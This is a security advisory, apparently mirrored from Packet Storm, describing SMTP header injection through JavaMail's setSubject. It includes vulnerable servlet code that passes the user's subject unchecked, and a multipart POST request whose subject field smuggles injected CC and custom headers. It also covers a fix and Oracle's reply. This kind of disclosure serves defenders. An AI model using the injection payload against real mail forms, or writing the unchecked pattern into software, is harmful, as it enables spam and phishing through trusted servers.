Oracle JavaMail SMTP Header Injection

2014-05-20T00:00:00
ID PACKETSTORM:126721
Type packetstorm
Reporter Alexandre Herzog
Modified 2014-05-20T00:00:00

Description

                                        
                                            `#############################################################  
#  
# COMPASS SECURITY ADVISORY  
# http://www.csnc.ch/en/downloads/advisories.html  
#  
#############################################################  
#  
# Product: JavaMail  
# Vendor: Oracle  
# CSNC ID: CSNC-2014-001   
# CVD ID: <none>  
# Subject: SMTP Header Injection via method setSubject  
# Risk: Medium  
# Effect: Remotely exploitable  
# Author: Alexandre Herzog <alexandre.herzog@csnc.ch>  
# Date: 19.05.2014  
#  
#############################################################  
  
Introduction:  
-------------  
The JavaMail API provides a platform-independent and   
protocol-independent framework to build mail and messaging applications.   
The JavaMail API is available as an optional package for use with the   
Java SE platform and is also included in the Java EE platform.[1]   
  
JavaMail does not check if the email subject contains a Carriage Return   
(CR) or a Line Feed (LF) character on POST multipart requests. This   
issue allows the injection of arbitrary SMTP headers in the generated  
email. This flaw can be used for sending SPAM or other social   
engineering attacks (e.g. abusing a trusted server to send HTML emails  
with malicious content).   
  
  
Affected:  
---------  
The following versions of JavaMail were tested and found vulnerable:  
- 1.4.5 (included in the .war file used as demo from [2])  
- 1.5.1 (latest version downloaded on 31.12.2013 from [3])  
  
  
Technical Description  
---------------------  
The tests were performed using the .war file downloaded from [2]. That   
code features an example on how to send a file per email using JSP and  
a servlet. The relevant parts of this example are:  
[...]  
/**  
* A utility class for sending e-mail message with attachment.  
* @author www.codejava.net  
*  
*/  
public class EmailUtility {  
  
/**  
* Sends an e-mail message from a SMTP host with a list of attached files.  
*  
*/  
public static void sendEmailWithAttachment(String host, String port,  
final String userName, final String password, String toAddress,  
String subject, String message, List<File> attachedFiles)  
throws AddressException, MessagingException {  
// sets SMTP server properties  
Properties properties = new Properties();  
properties.put("mail.smtp.host", host);  
properties.put("mail.smtp.port", port);  
properties.put("mail.smtp.auth", "true");  
properties.put("mail.smtp.starttls.enable", "true");  
properties.put("mail.user", userName);  
properties.put("mail.password", password);  
  
// creates a new session with an authenticator  
Authenticator auth = new Authenticator() {  
public PasswordAuthentication getPasswordAuthentication() {  
return new PasswordAuthentication(userName, password);  
}  
};  
Session session = Session.getInstance(properties, auth);  
  
// creates a new e-mail message  
Message msg = new MimeMessage(session);  
  
msg.setFrom(new InternetAddress(userName));  
InternetAddress[] toAddresses = { new InternetAddress(toAddress) };  
msg.setRecipients(Message.RecipientType.TO, toAddresses);  
==> msg.setSubject(subject);  
msg.setSentDate(new Date());  
[...]  
  
[...]  
/**  
* A servlet that takes message details from user and send it as a new e-mail  
* through an SMTP server. The e-mail message may contain attachments which  
* are the files uploaded from client.  
*  
* @author www.codejava.net  
*  
*/  
@WebServlet("/SendMailAttachServlet")  
  
// CSNC comment - this tag enables the processing of POST multipart requests  
@MultipartConfig(fileSizeThreshold = 1024 * 1024 * 2, // 2MB  
maxFileSize = 1024 * 1024 * 10, // 10MB  
maxRequestSize = 1024 * 1024 * 50) // 50MB  
public class SendMailAttachServlet extends HttpServlet {  
private String host;  
private String port;  
private String user;  
private String pass;  
  
public void init() {  
// reads SMTP server setting from web.xml file  
ServletContext context = getServletContext();  
host = context.getInitParameter("host");  
port = context.getInitParameter("port");  
user = context.getInitParameter("user");  
pass = context.getInitParameter("pass");  
}  
  
/**  
* handles form submission  
*/  
protected void doPost(HttpServletRequest request,  
HttpServletResponse response) throws ServletException, IOException {  
  
List<File> uploadedFiles = saveUploadedFiles(request);  
  
String recipient = request.getParameter("recipient");  
==> String subject = request.getParameter("subject");  
String content = request.getParameter("content");  
  
String resultMessage = "";  
  
try {  
==> EmailUtility.sendEmailWithAttachment(host, port, user, pass,  
recipient, subject, content, uploadedFiles);  
  
resultMessage = "The e-mail was sent successfully";  
} catch (Exception ex) {  
  
  
Below is a genuine request POST request for the example above, done  
using "Content-Type: multipart" as it involves uploading a file:   
POST /EmailAttachWebApp/SendMailAttachServlet HTTP/1.1  
Host: localhost:8080  
[...]  
Connection: keep-alive  
Content-Type: multipart/form-data; boundary=---------------------------205721274512326  
Content-Length: 1785  
  
-----------------------------205721274512326  
Content-Disposition: form-data; name="recipient"  
  
test@[redacted]  
-----------------------------205721274512326  
Content-Disposition: form-data; name="subject"  
  
With javax.mail.1.5.1  
-----------------------------205721274512326  
Content-Disposition: form-data; name="content"  
  
SMTP header injection test  
-----------------------------205721274512326  
Content-Disposition: form-data; name="file"; filename="NOTICE"  
Content-Type: application/octet-stream  
  
Apache Tomcat  
Copyright 1999-2012 The Apache Software Foundation   
[...]  
  
  
"Content-Type: multipart" allows us to submit a string containing a CR   
or LF without having to use HEX characters %0A and %0D nor \n and \r. In   
the JavaMail case, we abuse this feature to inject additional SMTP   
headers through the Subject parameter in the request:   
POST /EmailAttachWebApp/SendMailAttachServlet HTTP/1.1  
Host: localhost:8080  
[...]  
Connection: keep-alive  
Content-Type: multipart/form-data; boundary=---------------------------205721274512326  
Content-Length: 1839  
  
-----------------------------205721274512326  
Content-Disposition: form-data; name="recipient"  
  
test@[redacted]  
-----------------------------205721274512326  
Content-Disposition: form-data; name="subject"  
  
With javax.mail.1.5.1  
==> CC: injected.header@[redacted]  
==> X-other-header: foo bar  
-----------------------------205721274512326  
Content-Disposition: form-data; name="content"  
  
SMTP header injection test  
-----------------------------205721274512326  
Content-Disposition: form-data; name="file"; filename="NOTICE"  
Content-Type: application/octet-stream  
  
Apache Tomcat  
Copyright 1999-2012 The Apache Software Foundation  
[...]  
  
This email is sent successfully and is received by the recipient under   
the following form, where the injected SMTP headers are clearly visible:   
[...]  
From: [redacted]@gmail.com  
To: test@[redacted]  
Message-ID: <52c2e778.01030e0a.7154.fffff0c2@mx.google.com>  
Subject: With javax.mail.1.5.1  
CC: injected.header@[redacted]  
==> X-other-header: foo bar  
MIME-Version: 1.0  
Content-Type: multipart/mixed;   
boundary="----=_Part_0_1681986934.1388504951836"  
[...]  
  
------=_Part_0_1681986934.1388504951836  
Content-Type: text/html; charset=us-ascii  
Content-Transfer-Encoding: 7bit  
  
SMTP header injection test  
------=_Part_0_1681986934.1388504951836  
Content-Type: application/octet-stream; name=NOTICE  
Content-Transfer-Encoding: 7bit  
Content-Disposition: attachment; filename=NOTICE  
  
Apache Tomcat  
Copyright 1999-2012 The Apache Software Foundation  
[...]  
  
  
The same behavior can be observed when using JavaMail 1.4.5 (bundled by   
default in the example .war [2]) instead of the latest 1.5.1 JavaMail   
version.   
  
  
Workaround / Fix:  
-----------------  
Ensure your application strictly follows the JavaMail API and ensures   
the subject string does not contain any line breaks (as stated in some   
parts of the API [4]). An alternative would be to fix the setSubject   
method of JavaMail by either disallowing the usage of CR/LF characters   
or appending a space after each CR/LF character to be RFC compliant (see   
2.2.3 Long Header Fields of RFC 2822 [5]).   
  
Oracle issued the following statement regarding this matter: "The   
assessment from our engineering team is that this is not a bug in   
JavaMail API. The application is responsible to perform some input   
validation. In this particular case, the application is responsible for   
ensuring that the subject string does not contain any line breaks. The   
code demonstrated the issue is not an Oracle sample. Therefore, we are   
closing the issue as not-a-bug."   
  
  
Timeline:  
---------  
2014-05-19: Global publication of the advisory  
2014-03-19: Advisory sent to Compass Security's customers  
2014-02-19: Got confirmation from Oracle they agree our publication  
schedule  
2014-02-18: Informed Oracle that we plan to publish details of this  
issue to our customer this week and to the general  
public in a month  
2014-02-05: Informed Oracle we consider publishing this information  
2014-02-04: Response from Oracle: is not considered a bug  
2014-01-23: Status report from Oracle mentioning the case being  
"Under investigation / Being fixed in main codeline"  
2014-01-01: Reception acknowledgement from Oracle  
2014-01-01: Sending advisory and PoC to Oracle  
2014-01-01: Isolation and reproduction of an issue discovered  
previously by the author  
  
  
References:  
-----------  
[1] http://www.oracle.com/technetwork/java/javamail/index.html  
[2] http://www.codejava.net/java-ee/jsp/send-attachments-with-e-mail-using-jsp-servlet-and-javamail  
[3] https://java.net/projects/javamail/pages/Home  
[4] https://javamail.java.net/nonav/docs/api/javax/mail/internet/MimeMessage.html#setSubject(java.lang.String)  
[5] http://www.ietf.org/rfc/rfc2822.txt  
  
  
  
--  
Alexandre Herzog, CTO, Compass Security Schweiz AG  
Werkstrasse 20, 8645 Jona, Switzerland  
Schauplatzgasse 39, 3011 Bern, Switzerland  
http://www.csnc.ch/  
  
`